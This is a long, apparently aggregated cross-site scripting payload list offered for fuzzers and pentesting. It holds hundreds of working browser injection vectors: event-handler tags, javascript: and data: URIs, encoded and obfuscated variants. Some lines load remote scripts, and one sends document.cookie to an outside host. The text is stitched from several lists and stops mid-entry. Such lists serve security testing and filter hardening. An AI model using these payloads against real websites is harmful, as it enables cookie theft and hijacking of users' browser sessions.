"><img src=x onerror=prompt(1)> [Click here](javascript:alert(1)) "></script><svg/onload=alert("XSS")> <iframe src="http://businessinfo.co.uk/labs/xss/xss.swf"></iframe> '|alert('xss')|' +ADw-script+AD4-alert(document.location)+ADw-/script+AD4- data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTUE9TRUQvKTwvc2NyaXB0Pg==# %3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%64%65%3E &#x3C;&#x69;&#x66;&#x72;&#x61;&#x6D;&#x65;&#x20;&#x73;&#x72;&#x63;&#x3D;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x74;&#x65;&#x73;&#x74;&#x2E;&#x64;&#x65;&#x3E; &#60&#105&#102&#114&#97&#109&#101&#32&#115&#114&#99&#61&#104&#116&#116&#112&#58&#47&#47&#116&#101&#115&#116&#46&#100&#101&#62 PGlmcmFtZSBzcmM9aHR0cDovL3Rlc3QuZGU+ <img src=x onerror="this.src='http://deleteme.blackdoorsec.net/e.php?c=Correction'+document.cookie'" /> "><img src=x onclick=prompt(1)> "><img src=x ondblclick=prompt(1)> "><img src=x ondrag=prompt(1)> "><img src=x ondragend=prompt(1)> "><img src=x ondragenter=prompt(1)> "><img src=x ondragleave=prompt(1)> "><img src=x ondragover=prompt(1)> "><img src=x ondragstart=prompt(1)> "><img src=x ondrop=prompt(1)> "><img src=x onmousedown=prompt(1)> "><img src=x onmousemove=prompt(1)> "><img src=x onmouseout=prompt(1)> "><img src=x onmouseover=prompt(1)> "><img src=x onmouseup=prompt(1)> "><img src=x onmousewheel=prompt(1)> "><img src=x onscroll=prompt(1)> "><img src=x onwheel=prompt(1)> Her ----------------------------------------------- “ autofocusonfocus=alert(1)// “;alert(1)// ";document.body.addEventListener("DOMActivate",alert(1))// ";document.body.addEventListener("DOMActivate",prompt(1))// ";document.body.addEventListener("DOMActivate",confirm(1))// javascript:alert(1)// javascript&#00058;alert(1) javaSCRIPT&colon;alert(1) JaVaScRipT:alert(1) javas&Tab;cript:\u0061lert(1); javascript:\u0061lert&#x28;1&#x29 javascript&#x3A;alert&lpar;document&period;cookie&rpar; // AsharJaved -alert(1)- -prompt(1)- -confirm(1)- Der 
---------------------------------------------------- "><img srx=x onerror=alert(1)> <script>alert(1)</script> <scr<script>ipt>alert(99)</scr<script>ipt> <a href=”javascript:alert(1)”>Clickme</a> <img/src=aaa.jpg onerror=prompt(1);> <video src=x onerror=prompt(1);> <audio src=x onerror=prompt(1);> <iframesrc="javascript:alert(2)"> <iframe src="http://businessinfo.co.uk/labs/xss/xss.swf"></iframe> <iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">. <embed/src=//goo.gl/nlX0P> <form action="Javascript:alert(1)"><input type=submit> <formaction='data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt'><button>CLICK <table background=javascript:alert(1)></table> // Works on Opera 10.5 and IE6 <video poster=javascript:alert(1)//></video> // Works Upto Opera 10.5 <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4="> <object/data=//goo.gl/nlX0P? <isindexformaction="javascript:alert(1)" type=image> <input type="image" formaction=JaVaScript:alert(0)> <form><button formaction=javascript&colon;alert(1)>CLICKME <isindex action="javascript:alert(1)" type=image> <isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image> <isindex action=data:text/html, type=image> <applet code="javascript:confirm(document.cookie);"> // Firefox Only <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> <svg/onload=prompt(1);> <marquee/onstart=confirm(2)>/ <body onload=prompt(1);> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)> <video><source onerror="javascript:alert(1)"> <marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)> <body language=vbsonload=alert-1 // Works with IE8 <command onmouseover ="\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B">Save</command> // Works with IE8 <q/oncut=open()> <q/oncut=alert(1)> // Useful in-case 
of payload restrictions. <a onmouseover="javascript:window.onerror=alert;throw 1> <img src=x onerror="javascript:window.onerror=alert;throw 1"> <body/onload=javascript:window.onerror=eval;throw'=alert\x281\x29'; <img style="xss:expression(alert(0))"> // Works upto IE7. <div style="color:rgb(''&#0;x:expression(alert(1))"></div> // Works upto IE7. <style>#test{x:expression(alert(/XSS/))}</style> // Works upto IE7 <a onmouseover=location=’javascript:alert(1)>click <body onfocus="location='javascrpt:alert(1) >123 <meta http-equiv="refresh" content="0;url=//goo.gl/nlX0P"> <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:\u0061lert(1);"></g></svg> // By @secalert <svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/> // By Mario <svg><![CDATA[><imagexlink:href="]]><img/src=xx:xonerror=alert(2)//"></svg> // By @secalert <meta content="&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> <math><a xlink:href="//jsfiddle.net/t846h/">click // By Ashar Javed <svg><script>alert&#40/1/&#41</script> // Works With All Browsers <svg><script>alert&#40 1&#41 // Works with Opera Only ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> '';!--"<XSS>=&{()} <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=# onmouseover="alert('xxs')"> <IMG onmouseover="alert('xxs')"> <IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img> <IMG 
SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40; &#39;&#88;&#83;&#83;&#39;&#41;> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC="jav&#x09;ascript:alert('XSS');"> <IMG SRC="jav&#x0A;ascript:alert('XSS');"> <IMG SRC="jav&#x0D;ascript:alert('XSS');"> <IMG SRC=" &#14; javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> <<SCRIPT>alert("XSS");//<</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js?< B > <SCRIPT SRC=//ha.ckers.org/.j> <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < \";alert('XSS');// </TITLE><SCRIPT>alert("XSS");</SCRIPT> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS')"> <IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> <IMG SRC="livescript:[code]"> <BODY ONLOAD=alert('XSS')> <BGSOUND SRC="javascript:alert('XSS');"> <BR SIZE="&{alert('XSS')}"> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> exp/*<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'> <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <XSS STYLE="xss:expression(alert('XSS'))"> 
<XSS STYLE="behavior: url(xss.htc);"> ¼script¾alert(¢XSS¢)¼/script¾ <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <TABLE BACKGROUND="javascript:alert('XSS')"> <TABLE><TD BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]--> <BASE HREF="javascript:alert('XSS');//"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. 
If you add the attributes allowScriptAccess="never" and allownetworking="internal" to the tag, it can mitigate this risk (thank you to Jonathan Vanasco for the info): <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> a="get"; b="URL(\""; c="javascript:"; d="alert('XSS');\")"; eval(a+b+c+d); <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> <XML SRC="xsstest.xml" ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <HTML><BODY> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"> </BODY></HTML> <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> <? 
echo('<SCR)'; echo('IPT>alert("XSS")</SCRIPT>'); ?> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> <A HREF="http://1113982867/">XSS</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> <A HREF="http://0102.0146.0007.00000223/">XSS</A> <A HREF="h tt p://6 6.000146.0x7.147/">XSS</A> <A HREF="//www.google.com/">XSS</A> <A HREF="//google">XSS</A> <A HREF="http://ha.ckers.org@google">XSS</A> <A HREF="http://google:ha.ckers.org">XSS</A> <A HREF="http://google.com/">XSS</A> _________ _________.__ __ _________ .__ __ .__ \_ ___ \_______ ____ ______ ______ / _____/|__|/ |_ ____ / _____/ ___________|__|______/ |_|__| ____ ____ / \ \/\_ __ \/ _ \/ ___// ___/ \_____ \ | \ __\/ __ \ \_____ \_/ ___\_ __ \ \____ \ __\ |/ \ / ___\ \ \____| | \( <_> )___ \ \___ \ / \| || | \ ___/ / \ \___| | \/ | |_> > | | | | \/ /_/ > \______ /|__| \____/____ >____ > /_______ /|__||__| \___ > /_______ /\___ >__| |__| __/|__| |__|___| /\___ / \/ \/ \/ \/ \/ \/ \/ |__| \//_____/ Information: A lot of people asked us regarding our cross site scripting pentest sheet for a fuzzer or own scripts. 
For good results, you can use the following list with automated scripts or software, or for manual pentesting. This list goes out to all friends, nerds, pentesters & exploiters. Please extend the list and we will update it soon. Note: This is a technical attack sheet for cross-site scripting penetration tests. Cross Site Scripting Strings with TAG: <meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;"> <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>"> <SCRIPT>document.cookie=true;</SCRIPT> <IMG SRC="jav ascript:document.cookie=true;"> <IMG SRC="javascript:document.cookie=true;"> <IMG SRC=" &#14; javascript:document.cookie=true;"> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;> <SCRIPT>document.cookie=true;//<</SCRIPT> <SCRIPT <B>document.cookie=true;</SCRIPT> <IMG SRC="javascript:document.cookie=true;"> <iframe src="javascript:document.cookie=true;> <SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT> </TITLE><SCRIPT>document.cookie=true;</SCRIPT> <INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;"> <BODY BACKGROUND="javascript:document.cookie=true;"> <BODY ONLOAD=document.cookie=true;> <IMG DYNSRC="javascript:document.cookie=true;"> <IMG LOWSRC="javascript:document.cookie=true;"> <BGSOUND SRC="javascript:document.cookie=true;"> <BR SIZE="&{document.cookie=true}"> <LAYER SRC="javascript:document.cookie=true;"></LAYER> <LINK REL="stylesheet" HREF="javascript:document.cookie=true;"> <STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting ¼script¾document.cookie=true;¼/script¾ <IFRAME SRC="javascript:document.cookie=true;"></IFRAME> <FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET> <TABLE BACKGROUND="javascript:document.cookie=true;"> <TABLE><TD BACKGROUND="javascript:document.cookie=true;"> <DIV STYLE="background-image: url(javascript:document.cookie=true;)"> <DIV STYLE="background-image: 
url(&#1;javascript:document.cookie=true;)"> <DIV STYLE="width: expression(document.cookie=true);"> <STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE> <IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)"> <CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)"> exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'> <STYLE TYPE="text/javascript">document.cookie=true;</STYLE> <STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A> <STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE> <SCRIPT>document.cookie=true;</SCRIPT> <BASE HREF="javascript:document.cookie=true;//"> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML> <? 
echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4- <a href="javascript#document.cookie=true;"> <div onmouseover="document.cookie=true;"> <img src="javascript:document.cookie=true;"> <img dynsrc="javascript:document.cookie=true;"> <input type="image" dynsrc="javascript:document.cookie=true;"> <bgsound src="javascript:document.cookie=true;"> &<script>document.cookie=true;</script> &{document.cookie=true;}; <img src=&{document.cookie=true;};> <link rel="stylesheet" href="javascript:document.cookie=true;"> <img src="mocha:document.cookie=true;"> <img src="livescript:document.cookie=true;"> <a href="about:<script>document.cookie=true;</script>"> <body onload="document.cookie=true;"> <div style="background-image: url(javascript:document.cookie=true;);"> <div style="behaviour: url([link to code]);"> <div style="binding: url([link to code]);"> <div style="width: expression(document.cookie=true;);"> <style type="text/javascript">document.cookie=true;</style> <object classid="clsid:..." 
codebase="javascript:document.cookie=true;"> <style><!--</style><script>document.cookie=true;//--></script> <<script>document.cookie=true;</script> <script>document.cookie=true;//--></script> <!-- -- --><script>document.cookie=true;</script><!-- -- --> <img src="blah"onmouseover="document.cookie=true;"> <img src="blah>" onmouseover="document.cookie=true;"> <xml src="javascript:document.cookie=true;"> <xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml> <div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script> Cross Site Scripting Strings with close TAG: >"<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;"> >"<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>"> >"<SCRIPT>document.cookie=true;</SCRIPT> >"<IMG SRC="jav ascript:document.cookie=true;"> >"<IMG SRC="javascript:document.cookie=true;"> >"<IMG SRC=" &#14; javascript:document.cookie=true;"> >"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;> >"<SCRIPT>document.cookie=true;//<</SCRIPT> >"<SCRIPT <B>document.cookie=true;</SCRIPT> >"<IMG SRC="javascript:document.cookie=true;"> >"<iframe src="javascript:document.cookie=true;> >"<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT> >"</TITLE><SCRIPT>document.cookie=true;</SCRIPT> >"<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;"> >"<BODY BACKGROUND="javascript:document.cookie=true;"> >"<BODY ONLOAD=document.cookie=true;> >"<IMG DYNSRC="javascript:document.cookie=true;"> >"<IMG LOWSRC="javascript:document.cookie=true;"> >"<BGSOUND SRC="javascript:document.cookie=true;"> >"<BR SIZE="&{document.cookie=true}"> >"<LAYER SRC="javascript:document.cookie=true;"></LAYER> >"<LINK REL="stylesheet" HREF="javascript:document.cookie=true;"> >"<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting >"¼script¾document.cookie=true;¼/script¾ >"<IFRAME 
SRC="javascript:document.cookie=true;"></IFRAME> >"<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET> >"<TABLE BACKGROUND="javascript:document.cookie=true;"> >"<TABLE><TD BACKGROUND="javascript:document.cookie=true;"> >"<DIV STYLE="background-image: url(javascript:document.cookie=true;)"> >"<DIV STYLE="background-image: url(&#1;javascript:document.cookie=true;)"> >"<DIV STYLE="width: expression(document.cookie=true);"> >"<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE> >"<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)"> >"<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)"> >"exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'> >"<STYLE TYPE="text/javascript">document.cookie=true;</STYLE> >"<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A> >"<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE> >"<SCRIPT>document.cookie=true;</SCRIPT> >"<BASE HREF="javascript:document.cookie=true;//"> >"<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT> >"<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> >"<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> >"<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML> >"<? 
echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?> >"<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4- >"<a href="javascript#document.cookie=true;"> >"<div onmouseover="document.cookie=true;"> >"<img src="javascript:document.cookie=true;"> >"<img dynsrc="javascript:document.cookie=true;"> >"<input type="image" dynsrc="javascript:document.cookie=true;"> >"<bgsound src="javascript:document.cookie=true;"> >"&<script>document.cookie=true;</script> >"&{document.cookie=true;}; >"<img src=&{document.cookie=true;};> >"<link rel="stylesheet" href="javascript:document.cookie=true;"> >"<img src="mocha:document.cookie=true;"> >"<img src="livescript:document.cookie=true;"> >"<a href="about:<script>document.cookie=true;</script>"> >"<body onload="document.cookie=true;"> >"<div style="background-image: url(javascript:document.cookie=true;);"> >"<div style="behaviour: url([link to code]);"> >"<div style="binding: url([link to code]);"> >"<div style="width: expression(document.cookie=true;);"> >"<style type="text/javascript">document.cookie=true;</style> >"<object classid="clsid:..." 
codebase="javascript:document.cookie=true;"> >"<style><!--</style><script>document.cookie=true;//--></script> >"<<script>document.cookie=true;</script> >"<script>document.cookie=true;//--></script> >"<!-- -- --><script>document.cookie=true;</script><!-- -- --> >"<img src="blah"onmouseover="document.cookie=true;"> >"<img src="blah>" onmouseover="document.cookie=true;"> >"<xml src="javascript:document.cookie=true;"> >"<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml> >"<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script> Cross Site Scripting Strings with negative value & TAG: -1<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;"> -1<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>"> -1<SCRIPT>document.cookie=true;</SCRIPT> -1<IMG SRC="jav ascript:document.cookie=true;"> -1<IMG SRC="javascript:document.cookie=true;"> -1<IMG SRC=" &#14; javascript:document.cookie=true;"> -1<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;> -1<SCRIPT>document.cookie=true;//<</SCRIPT> -1<SCRIPT <B>document.cookie=true;</SCRIPT> -1<IMG SRC="javascript:document.cookie=true;"> -1<iframe src="javascript:document.cookie=true;> -1<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT> -1</TITLE><SCRIPT>document.cookie=true;</SCRIPT> -1<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;"> -1<BODY BACKGROUND="javascript:document.cookie=true;"> -1<BODY ONLOAD=document.cookie=true;> -1<IMG DYNSRC="javascript:document.cookie=true;"> -1<IMG LOWSRC="javascript:document.cookie=true;"> -1<BGSOUND SRC="javascript:document.cookie=true;"> -1<BR SIZE="&{document.cookie=true}"> -1<LAYER SRC="javascript:document.cookie=true;"></LAYER> -1<LINK REL="stylesheet" HREF="javascript:document.cookie=true;"> -1<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting 
-1¼script¾document.cookie=true;¼/script¾ -1<IFRAME SRC="javascript:document.cookie=true;"></IFRAME> -1<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET> -1<TABLE BACKGROUND="javascript:document.cookie=true;"> -1<TABLE><TD BACKGROUND="javascript:document.cookie=true;"> -1<DIV STYLE="background-image: url(javascript:document.cookie=true;)"> -1<DIV STYLE="background-image: url(&#1;javascript:document.cookie=true;)"> -1<DIV STYLE="width: expression(document.cookie=true);"> -1<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE> -1<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)"> -1<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)"> -1exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'> -1<STYLE TYPE="text/javascript">document.cookie=true;</STYLE> -1<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A> -1<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE> -1<SCRIPT>document.cookie=true;</SCRIPT> -1<BASE HREF="javascript:document.cookie=true;//"> -1<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT> -1<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> -1<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> -1<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML> -1<? 
echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?> -1<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4- -1<a href="javascript#document.cookie=true;"> -1<div onmouseover="document.cookie=true;"> -1<img src="javascript:document.cookie=true;"> -1<img dynsrc="javascript:document.cookie=true;"> -1<input type="image" dynsrc="javascript:document.cookie=true;"> -1<bgsound src="javascript:document.cookie=true;"> -1&<script>document.cookie=true;</script> -1&{document.cookie=true;}; -1<img src=&{document.cookie=true;};> -1<link rel="stylesheet" href="javascript:document.cookie=true;"> -1<img src="mocha:document.cookie=true;"> -1<img src="livescript:document.cookie=true;"> -1<a href="about:<script>document.cookie=true;</script>"> -1<body onload="document.cookie=true;"> -1<div style="background-image: url(javascript:document.cookie=true;);"> -1<div style="behaviour: url([link to code]);"> -1<div style="binding: url([link to code]);"> -1<div style="width: expression(document.cookie=true;);"> -1<style type="text/javascript">document.cookie=true;</style> -1<object classid="clsid:..." 
